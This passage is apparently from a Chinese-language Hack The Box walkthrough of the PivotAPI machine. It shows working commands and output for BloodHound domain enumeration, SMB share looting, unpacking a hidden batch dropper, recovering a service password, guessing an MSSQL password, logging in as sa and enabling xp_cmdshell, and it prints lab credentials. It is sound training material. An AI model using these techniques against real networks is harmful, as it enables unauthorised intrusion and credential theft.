                        NTLM hashes, format is LMHASH:NTHASH                                    
  -no-pass              don't ask for password (useful for -k)                                  
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# mssqlclient.py LicorDebellota.htb/kaorz:Roper4155@$ip1
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS

连接不了,说明该用户没有连接数据库的权限

尝试获取更多潜在攻击路径

既然已知的端口我们都利用完了,没有利用成功,还可以利用bloodhound工具来探测更多潜在的可尝试攻击路径

Bloodhound 使用凭据泄露和域环境中的关系数据来构建域图,展示域中的权限关系和攻击路径。它通过收集信息,识别域用户、组、计算机和关系,以及评估域策略和权限来帮助安全团队识别潜在的攻击路径和安全漏洞。

由于我们已经获取到了一个凭据,因此除了该工具的主程序,我们还要安装对应的域信息采集器,即impacket框架中的一个python脚本:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# apt search bloodhound 
Sorting... Done
Full Text Search... Done
bloodhound/kali-rolling,now 4.3.1-0kali2 amd64 [installed]
  Six Degrees of Domain Admin

bloodhound-dbgsym/kali-rolling 4.3.1-0kali2 amd64
  debug symbols for bloodhound

bloodhound.py/kali-rolling,kali-rolling 1.7.2-0kali1 all
  ingestor for BloodHound, based on Impacket (Python 3)

ruby-rails-assets-corejs-typeahead/kali-rolling,kali-rolling 1.2.1-3 all
  Fast and fully-featured autocomplete search library
                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# apt-get install bloodhound.py

在启动该工具之前,使用另外的命令窗口先初始化一下对应数据库:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# neo4j restart
Neo4j is not running.
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:30626). It is available at http://localhost:7474
There may be a short delay until the server is ready.

初始化成功,并且开放了对应的web访问途径,默认的账号密码都是neo4j,登录后会提示我们修改密码
确保下面的端口可用:
2024-01-28-09-50-06
最后回到主窗口执行命令bloodhound
刚开始进去是空白的,这很正常,因为我们还没有导入数据,先退出,利用我们获取到的凭据执行bloodhound采集器采集更多域信息:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# bloodhound-python -c ALL -u kaorz -p Roper4155 -d LicorDebellota.htb -dc LicorDebellota.htb -ns 10.129.228.115 --zip
INFO: Found AD domain: licordebellota.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: LicorDebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: LicorDebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 28 users
INFO: Found 58 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: PivotAPI.LicorDeBellota.htb
INFO: Done in 00M 58S
INFO: Compressing output into 20240128095527_bloodhound.zip

采集到了很多信息,说明这个用户凭据是有效的,最终结果也打包成了.zip
我们导入该压缩包时不需要解压,但是又想预先查看一下里面的文件,可以执行:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# unzip -l 20240128095527_bloodhound.zip 
Archive:  20240128095527_bloodhound.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     5988  2024-01-28 09:55   20240128095527_gpos.json
    69252  2024-01-28 09:55   20240128095527_users.json
    27439  2024-01-28 09:55   20240128095527_containers.json
    94348  2024-01-28 09:55   20240128095527_groups.json
     3164  2024-01-28 09:55   20240128095527_domains.json
     4465  2024-01-28 09:56   20240128095527_computers.json
     1672  2024-01-28 09:55   20240128095527_ous.json
---------                     -------
   206328                     7 files

然后就可以导入到主程序进行分析,点击右上角的upload data:
2024-02-06-16-30-29
刷新一下数据库就会出现分析到的信息,然后搜索我们获取到的用户并标注已占有:
2024-02-06-16-45-37
2024-02-06-16-46-25

选择后该用户会出现骷髅头标志,点击该用户查看节点信息,发现该用户没有可以控制的任何目标:
2024-02-06-16-47-21
2024-02-06-16-49-23
选择analysis,选择从已占有的主体获取最短路径后,也没有结果显示,查看其他信息也没有什么可以利用的地方

尝试重新获取smb共享

我们刚开始是通过匿名用户获取smb共享,没有成功,但是现在获取到了一个用户凭据,可以尝试重新利用:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbmap -H $ip1 -u kaorz -p Roper4155

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.129.228.115:445      Name: PivotAPI.LicorDeBellota.htb       Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Admin remota
        C$                                                      NO ACCESS       Recurso predeterminado
        IPC$                                                    READ ONLY       IPC remota
        NETLOGON                                                READ ONLY       Recurso compartido del servidor de inicio de sesión 
        SYSVOL                                                  READ ONLY       Recurso compartido del servidor de inicio de sesión
# 列出了共享信息,且存在可读的共享目录,尝试访问一下
# 如果`smbmap`没有获取到共享,可以尝试`crackmapexec`等工具
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbclient -U LicorDebellota.htb/kaorz //$ip1/IPC$
Password for [LICORDEBELLOTA.HTB\kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> quit
                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbclient -U LicorDebellota.htb/kaorz //$ip1/NETLOGON
Password for [LICORDEBELLOTA.HTB\kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug  8 18:42:28 2020
  ..                                  D        0  Sat Aug  8 18:42:28 2020
  HelpDesk                            D        0  Sun Aug  9 23:40:36 2020

                5158399 blocks of size 4096. 1027960 blocks available
smb: \> cd HelpDesk\
smb: \HelpDesk\> ls
  .                                   D        0  Sun Aug  9 23:40:36 2020
  ..                                  D        0  Sun Aug  9 23:40:36 2020
  Restart-OracleService.exe           A  1854976  Fri Feb 19 18:52:01 2021
  Server MSSQL.msg                    A    24576  Sun Aug  9 19:04:14 2020
  WinRM Service.msg                   A    26112  Sun Aug  9 19:42:20 2020

                5158399 blocks of size 4096. 1027959 blocks available
smb: \HelpDesk\> prompt off
smb: \HelpDesk\> mget *
parallel_read returned NT_STATUS_IO_TIMEOUT
getting file \HelpDesk\Restart-OracleService.exe of size 1854976 as Restart-OracleService.exe getting file \HelpDesk\Server MSSQL.msg of size 24576 as Server MSSQL.msg (20.8 KiloBytes/sec) (average 20.8 KiloBytes/sec)
getting file \HelpDesk\WinRM Service.msg of size 26112 as WinRM Service.msg (25.9 KiloBytes/sec) (average 23.2 KiloBytes/sec)
smb: \HelpDesk\> quit
                        
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbclient -U LicorDebellota.htb/kaorz //$ip1/SYSVOL  
Password for [LICORDEBELLOTA.HTB\kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug  8 08:59:02 2020
  ..                                  D        0  Sat Aug  8 08:59:02 2020
  LicorDeBellota.htb                 Dr        0  Sat Aug  8 08:59:02 2020

                5158399 blocks of size 4096. 1027797 blocks available
smb: \> cd LicorDeBellota.htb\
smb: \LicorDeBellota.htb\> ls
  .                                   D        0  Sat Aug  8 09:00:44 2020
  ..                                  D        0  Sat Aug  8 09:00:44 2020
  DfsrPrivate                      DHSr        0  Sat Aug  8 09:00:44 2020
  Policies                            D        0  Sat Aug  8 21:45:40 2020
  scripts                             D        0  Sat Aug  8 18:42:28 2020

                5158399 blocks of size 4096. 1027797 blocks available

然后依次遍历访问每个目录,下载最有可能看起来是有价值的文件,最终只下载了NETLOGON中的三个文件:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls
 20240128095527_bloodhound.zip   ftp   Kaorz_hash   nmapscan   pdf_authors   pivotapi.pdf   Restart-OracleService.exe  'Server MSSQL.msg'   users_list  'WinRM Service.msg'
# 如果下载二进制程序失败,可以采用下面的替代方案:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbget -U kaorz%Roper4155 smb://10.129.228.115/NETLOGON/HelpDesk/Restart-OracleService.exe
Using domain: WORKGROUP, user: kaorz
[Restart-OracleService.exe] 62.50kB of 1.77MB (3.45%) at 2.98kB/s ETA: 00:09:47
[Restart-OracleService.exe] 562.50kB of 1.77MB (31.05%) at 9.53kB/s ETA: 00:02:115
smb://10.129.228.115/NETLOGON/HelpDesk/Restart-OracleService.exe                                                                                                               
Downloaded 1.77MB in 171 seconds
          
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls -liah
total 17M
4750478 drwxr-xr-x 4 root     root     4.0K Jan 28 23:10  .
4729383 drwxr-xr-x 3 root     root     4.0K Jan 28 09:59  ..
4763356 -rw-r--r-- 1 root     root     203K Jan 28 09:56  20240128095527_bloodhound.zip
5012685 drwxr-xr-x 3 root     root     4.0K Jan 15 16:51  ftp
4763218 -rw-r--r-- 1 root     root      567 Jan 27 23:31  Kaorz_hash
4870101 drwxr-xr-x 2 root     root     4.0K Jan 15 15:36  nmapscan
4729293 -rw-r--r-- 1 root     root       35 Jan 27 16:13  pdf_authors
4652927 -rw-r--r-- 1 cvestone cvestone  14M Jan 14 22:32  pivotapi.pdf
4751922 -rwxr-xr-x 1 root     root     1.8M Jan 28 23:13  Restart-OracleService.exe
4763357 -rw-r--r-- 1 root     root      59K Jan 28 10:37 'Server MSSQL.eml'
4763351 -rw-r--r-- 1 root     root      24K Jan 28 10:29 'Server MSSQL.msg'
4728636 -rw-r--r-- 1 root     root       79 Jan 27 22:20  users_list
4763358 -rw-r--r-- 1 root     root      64K Jan 28 10:37 'WinRM Service.eml'
4763355 -rw-r--r-- 1 root     root      26K Jan 28 10:29 'WinRM Service.msg'
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# file *.msg                                                              
Server MSSQL.msg:  CDFV2 Microsoft Outlook Message                                                                                   
WinRM Service.msg: CDFV2 Microsoft Outlook Message
# 这里可以在搜索引擎搜索如何查看Outlook Message,结果显示可以用以下工具进行格式转换
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# msgconvert *.msg

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls
 20240128095527_bloodhound.zip   Kaorz_hash   pdf_authors    Restart-OracleService.exe  'Server MSSQL.msg'  'WinRM Service.eml'
 ftp                             nmapscan     pivotapi.pdf  'Server MSSQL.eml'           users_list         'WinRM Service.msg'
# 转换成了`.eml`格式,可以用kali自带的mousepad打开
分析邮件

拿到一封邮件文件,首先一定要注意识别收发人的账户信息
Server MSSQL.eml

Date: Sun, 09 Aug 2020 11:04:14 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=17064094600.F3AEBbC1.58748
Content-Transfer-Encoding: 7bit
Subject: Server MSSQL
To: cybervaca@licordebellota.htb <cybervaca@licordebellota.htb>


--17064094600.F3AEBbC1.58748
Content-Type: text/plain; charset=UTF-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit

Good afternoon,
 
Due to the problems caused by the Oracle database installed in 2010 in Windows, it has been decided to migrate to MSSQL at the beginning of 2020.
Remember that there were problems at the time of restarting the Oracle service and for this reason a program called "Reset-Service.exe" was created to log in to Oracle and restart the service.
 
Any doubt do not hesitate to contact us.
 
Greetings,
 
The HelpDesk Team

--17064094600.F3AEBbC1.58748
Content-Type: application/rtf
Content-Disposition: inline
Content-Transfer-Encoding: base64

e1xydGYxXGFuc2lcYW5zaWNwZzEyNTJcZnJvbWh0bWwxIFxmYmlkaXMgXGRlZmYwe1xmb250dGJs
Cg17XGYwXGZzd2lzc1xmY2hhcnNldDAgQXJpYWw7fQoNe1xmMVxmbW9kZXJuIENvdXJpZXIgTmV3
O30KDXtcZjJcZm5pbFxmY2hhcnNldDIgU3ltYm9sO30KDXtcZjNcZm1vZGVyblxmY2hhcnNldDAg。。。。。

这封邮件正文中提到由于2010年Oracle数据库安装导致的问题,2020年决定迁移到MSSQL,并提到可以用我们获取到的Restart-OracleService.exe
登录Oracle并重启它。说明这是属于运维提醒的邮件,我们要重点记住这类信息。
接下来是WinRM Service.eml:

Date: Sun, 09 Aug 2020 11:42:20 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=17064094601.94Ba595C.58748
Content-Transfer-Encoding: 7bit
Subject: WinRM Service
To: helpdesk@licordebellota.htb <helpdesk@licordebellota.htb>


--17064094601.94Ba595C.58748
Content-Type: text/plain; charset=UTF-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit

Good afternoon.
 
After the last pentest, we have decided to stop externally displaying WinRM's service. Several of our employees are the creators of Evil-WinRM so we do not want to expose this service... We have created a rule to block the exposure of the service and we have also blocked the TCP, UDP and even ICMP output (So that no shells of the type icmp are used.)
Greetings,
 
The HelpDesk Team

--17064094601.94Ba595C.58748
Content-Type: application/rtf
Content-Disposition: inline
Content-Transfer-Encoding: base64

e1xydGYxXGFuc2lcYW5zaWNwZzEyNTJcZnJvbWh0bWwxIFxmYmlkaXMgXGRlZmYwe1xmb250dGJs。。。。。

邮件正文中提到网络中创建了规则来阻止WinRM服务的暴露,并封锁了TCP, UDP甚至ICMP输出,因此没有imcp类型的shell可以使用。这同样是重要的信息,先记在脑子里。

分析程序1

查看一下该可执行程序的具体类型:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# file Restart-OracleService.exe 
Restart-OracleService.exe: PE32+ executable (console) x86-64, for MS Windows, 6 sections

是一个amd64的windows扩展可执行程序,还可以看看该程序中的可读字符串,这些都是逆向二进制程序的基本必要分析操作

# 查看有多少行,并写入到单独文件中
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings Restart-OracleService.exe | wc -l                     
23671
          
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings Restart-OracleService.exe | tee strings_Restart-Oracle

可以大致浏览一下这个文件,看看是否有一些敏感数据或者关键的逻辑语句可以作为有价值的信息,最终发现:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cat strings_Restart-Oracle| grep inf 
 inflate 1.2.11 Copyright 1995-2017 Mark Adler 

可以问chatgpt这是什么意思,chatgpt有时候虽然是不可靠的,但是初始筛查信息可以用,大多时候还是google搜索引擎更靠谱,最终表明这是关于软件或库的版权声明,inflate用来描述数据的解压缩,根据这个信息暂时还是没有什么利用的想法。
再看看动态链接库:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ldd Restart-OracleService.exe 
        不是动态可执行文件

初步静态分析后,可以用ida或ghidra进行更深入分析,发现即使反编译后很难识别,很难看出比较清晰的程序逻辑,且许多函数都看起来没什么意义,推测该程序被加密或混淆过,静态分析很困难,可以尝试动态分析

监视进程与注册表:

对于初步分析一般使用microsoft的sysinternals套件,访问下面链接下载:https://learn.microsoft.com/zh-cn/sysinternals/downloads
先用procmon捕获程序运行时相关的进程以及注册表等信息:
2024-02-06-17-41-59
同时先设置筛选,避免太多干扰项:
2024-02-06-17-46-01
然后开启捕获模式,同时运行程序,然后清空,重复这个过程,至少3次,看左下角显示相关事件数量是否都差不多,保证程序确实完整运行。
观察过程中,这个程序的行为中出现了很多次像下面的流程:
2024-02-06-17-54-34
这显然比起其他的注册表读取系统配置等操作,更让我们感兴趣,因为这是创建了批处理脚本来执行某些命令,并且最后它还销毁了这些批处理文件,这更让人觉得可疑,另外,每次执行程序后,这些批处理文件名字不一样,应该是随机生成的
我们可以进一步筛选,只关注这个批处理脚本
2024-02-06-18-00-15
同样可以清空再重新重复该步骤,对比一下是否和上一次行为一样或差不多,这可以保证我们确实捕捉了完整的程序行为:
2024-02-06-18-05-33

文件持久化措施:修改目录权限

我们想要知道这个批处理脚本具体做了什么,但是每次程序运行时都会删除它,我们可以通过给Temp目录修改权限来阻止程序删除该脚本:
禁用继承
2024-02-06-18-10-03
然后编辑当前用户的权限,改成如下所示:
2024-02-06-18-11-28

文件持久化措施:修改原脚本执行逻辑

首先分析捕获到的bat脚本:

@shift /0
@echo off

if %username% == cybervaca goto correcto
if %username% == frankytech goto correcto
if %username% == ev4si0n goto correcto
goto error

:correcto
echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > c:\programdata\oracle.txt
echo AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g >> c:\programdata\oracle.txt
。。。
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> c:\programdata\oracle.txt

echo $salida = $null; $fichero = (Get-Content C:\ProgramData\oracle.txt) ; foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("c:\programdata\restart-service.exe", [System.Convert]::FromBase64String($salida)) > c:\programdata\monta.ps1
powershell.exe -exec bypass -file c:\programdata\monta.ps1
del c:\programdata\monta.ps1
del c:\programdata\oracle.txt
c:\programdata\restart-service.exe
del c:\programdata\restart-service.exe

:error

根据当前登录用户的用户名进行条件判断。如果当前用户名是cybervaca、frankytech或ev4si0n,则跳转到标签:correcto,否则跳转到标签:error,其中:correcto中脚本将一系列像base64加密过的文本输出到文件c:\programdata\oracle.txt中,然后经过一系列文本处理后将该txt生成新的程序,路径是c:\programdata\restart-service.exe,最后执行完该程序后,删除。在这里,我们可以稍微修改一下该批处理脚本的逻辑,使其最终能够保留新的程序,便于我们分析:

@shift /0
@echo off

goto correcto
goto error

:correcto
echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > c:\programdata\oracle.txt
echo AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g >> c:\programdata\oracle.txt
。。。
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> c:\programdata\oracle.txt

echo $salida = $null; $fichero = (Get-Content C:\ProgramData\oracle.txt) ; foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("c:\programdata\restart-service.exe", [System.Convert]::FromBase64String($salida)) > c:\programdata\monta.ps1
powershell.exe -exec bypass -file c:\programdata\monta.ps1

:error

然后执行修改后的bat脚本,发现相关的文件也被我们捕获到了:
2024-02-06-18-36-56
只有这个新程序是我们感兴趣的,放进kali继续分析:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# file restart-service.exe      
restart-service.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, 10 sections
                      
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe | wc -l
10996
                               
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe > restart-service-strings


该程序被剥离了外部 PDB(Program Database)信息,这可能意味着调试信息已被移除,看看strings:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe | wc -l
10996
                                                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe > restart-service-strings
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe| grep user 
__setusermatherr                                                                                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe| grep -i passw                                                                      
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe| grep -i kaorz

进一步静态分析看看,和之前遇到的情况一样,也似乎被加密混淆了,难以分析。接下来同样可以先用procmon动态分析,步骤也和之前一样,但最终仍没有获取到有价值信息。

监视api与传参

上面是从比较宏观的角度监视程序的行为,我们还可以更细致些,尝试去监视程序执行过程中调用的api接口、传递的参数等,看看是否能够获取到敏感信息,对于windows程序可以使用api monitor工具,下载链接:
http://www.rohitab.com/downloads
注意左边的api模板选中全部,然后创建新的监视进程,选择restart-service.exe所在路径,由前面获取到的有价值信息中我们了解到目标敏感信息是一个凭据,所以我们可以尝试搜素任何与凭据有关的关键字,看看api调用和参数传递中是否包含这些关键字,很快,我们找到了:
2024-02-07-10-49-15
svc_oracle:#oracle_s3rV1c3!2010
显然这是Oracle的登录凭据,将它单独存放为一个文件
回顾前面的邮件内容中的关键运维事件,由于2010年Oracle数据库安装导致的问题,2020年迁移到MSSQL,说明获取到的这个凭据不一定能够成功,但是存在"撞库"的可能性,由于这个密码看起来也有一定的规则性,也有密码爆破、猜测等可能性
可以在bloodhound看看是否还存在这个用户,或者与其相似的:
2024-02-07-11-59-28
查到了另一个用户,是mssql的,因此我们可以合理猜测mssql的密码应该也是采用与oracle相同的规则,除了s3rV1c3!保持不变,年份(可以发现和邮件中提到的对应上了)和前缀(服务名)都修改成符合获取到关于mssql的信息,即:
svc_mssql:#mssql_s3rV1c3!2020
查看凭据是否有效:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# crackmapexec smb $ip1 -u svc_mssql -p '#mssql_s3rV1c3!2020'
SMB         10.129.207.210  445    PIVOTAPI         [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)

[*] completed: 100.00% (1/1)
SMB         10.129.207.210  445    PIVOTAPI         [+] LicorDeBellota.htb\svc_mssql:#mssql_s3rV1c3!2020

显然有效。这并不是巧合,因为很多大型公司中都是有严格的规章制度的,运维设置的密码也有很大可能性是有章法可循的,并且上面的猜测也是基于我们获取到的有价值的信息基础上作出的,最后还做了初步验证

连接mssql获取更多信息

尝试连接mssql:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# mssqlclient.py 'LicorDebellota.htb/svc_mssql:#mssql_s3rV1c3!2020@10.129.207.210'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (sa  dbo@master)> 

可以发现,当我们尝试用获取到的凭据第一次连接并没有成功,但是换成mssql默认用户名登录时成功了,如果依旧没有成功,我们还可以考虑之前.bat脚本中泄漏出的3个用户名,接下来就可以尝试是否能够开启执行命令选项,从而进行更深入地搜集信息:

SQL (sa  dbo@master)> enable_xp_cmdshell
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 185: Se ha cambiado la opción de configuración 'show advanced options' de 1 a 1. Ejecute la instrucción RECONFIGURE para instalar.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 185: Se ha cambiado la opción de configuración 'xp_cmdshell' de 1 a 1. Ejecute la instrucción RECONFIGURE para instalar.
SQL (sa  dbo@master)> xp_cmdshell whoami
output                        
---------------------------   
nt service\mssql$sqlexpress   

NULL                          

SQL (sa  dbo@master)> 

收集到的系统信息:

SQL (sa dbo@master)> xp_cmdshell systeminfo
output
--------------------------------------------------------------------------------
NULL

Host Name:                               PIVOTAPI

OS Name:                                 Microsoft Windows Server 2019 Standard

OS Version:                              10.0.17763 N/D Build 17763

OS Manufacturer:                         Microsoft Corporation

OS Configuration:                        Primary Domain Controller

OS Build Type:                            Multiprocessor Free

Registered Owner:                        Windows User

Registered Organization:

Product ID:                              00429-00520-27817-AA848

Original Install Date:                   07/08/2020, 23:14:31

System Boot Time:                        06/02/2024, 8:39:58

System Manufacturer:                     VMware, Inc.

System Model:                            VMware7,1

System Type:                             x64-based PC

Processor(s):                            2 Processor(s) Installed.

                                       [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz

                                       [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz

BIOS Version:                            VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020

Windows Directory:                       C:\Windows

System Directory:                        C:\Windows\system32

Boot Device:                             \Device\HarddiskVolume2

System Locale:                           es;Spanish (International)

Input Locale:                            en-us;English (United States)

Time Zone:                               (UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna

Total Physical Memory:                   4,095 MB

Available Physical Memory:               2,888 MB

Virtual Memory: Max Size:                 4,799 MB

Virtual Memory: Available:                3,520 MB

Virtual Memory: In Use:                   1,279 MB

Page File Location(s):                    C:\pagefile.sys

Domain:                                  LicorDeBellota.htb

Logon Server:                            N/A

Hotfix(es):                             8 Hotfix(s) Installed.

                                       [01]: KB4601558

                                       [02]: KB4494174

                                       [03]: KB4535680

                                       [04]: KB4558997

                                       [05]: KB4577586

                                       [06]: KB4601393

                                       [07]: KB5001404

                                       [08]: KB5001342

Network Card(s):                         1 NIC(s) Installed.

                                       [01]: vmxnet3 Ethernet Adapter

                                             Connection Name: Ethernet0 2

                                             DHCP Enabled:    Yes

                                             DHCP Server:      10.129.0.1

                                             IP Address(es)

                                             [01]: 10.129.207.210

Hyper-V Requirements:                    A hypervisor was detected. Features required for Hyper-V will not be displayed.

查看当前用户具有哪些权限:

SQL (sa dbo@master)> xp_cmdshell whoami /priv
output
--------------------------------------------------------------------------------
NULL

PRIVILEGE INFORMATION

--------------------------

NULL

Privilege Name               Description                                      State          

============================= ================================================ =============

SeAssignPrimaryTokenPrivilege Replace a process-level token                    Disabled

SeIncreaseQuotaPrivilege      Adjust memory quotas for a process               Disabled

SeMachineAccountPrivilege     Add workstations to the domain                   Disabled

SeChangeNotifyPrivilege       Bypass traverse checking                         Enabled

SeManageVolumePrivilege       Perform volume maintenance tasks                 Enabled

SeImpersonatePrivilege        Impersonate a client after authentication        Enabled

SeCreateGlobalPrivilege       Create global objects                            Enabled

SeIncreaseWorkingSetPrivilege Increase a process working set                   Disabled

显然从经验来看,SeImpersonatePrivilegeSeManageVolumePrivilege都是和权限提升利用相关的关键权限,可以尝试,但如果是作为域渗透的学习,该优先级可以暂时靠后(因为能直接通过工具提权的可能性)
我们还可以看一下是否还有其他域用户:

SQL (sa dbo@master)> xp_cmdshell net user
output
-------------------------------------------------------------------------------
NULL

User accounts on \\PIVOTAPI

NULL

-------------------------------------------------------------------------------

0xdf                     0xVIC                    3v4Si0N

Administrador            aDoN90                   borjmz

cybervaca                Dr.Zaiuss                Fiiti

FrankyTech               Gh0spp7                  gibdeon

Invitado                 ippsec                   jari

Jharvar                  Kaorz                    krbtgt

lothbrok                 manulqwerty              OscarAkaElvis

socketz                  sshd                     StooormQ

superfume                svc_mssql                v1s0r

The command completed successfully.

我们发现了获取到的凭据用户名svc_mssql,看看关于它的详细信息:

SQL (sa dbo@master)> xp_cmdshell net user svc_mssql /domain
output
-----------------------------------------------------------------------------
Username                                  svc_mssql                             

Full Name                                mssql service                         

Comment                                                                      

User's comment                                                                

Country/region code                      000 (Default by the computer)          

Account active                           Yes                                  

Account expires                          Never                                

NULL                                                                         

Last password change                     08/08/2020 17:15:22                  

Password expires                         Never                                

Password changeable                      09/08/2020 17:15:22                  

Password required                        Yes                                  

User may change password                  No                                  

NULL                                                                         

Workstations allowed                     All                                  

Logon script                                                                  

User profile                                                                 

Home directory                                                              

Last logon                               09/08/2020 17:22:26                  

NULL                                                                         

Logon hours allowed                      All                                  

NULL                                                                         

Local group memberships                                                      

Global group memberships                 *Domain Users                         

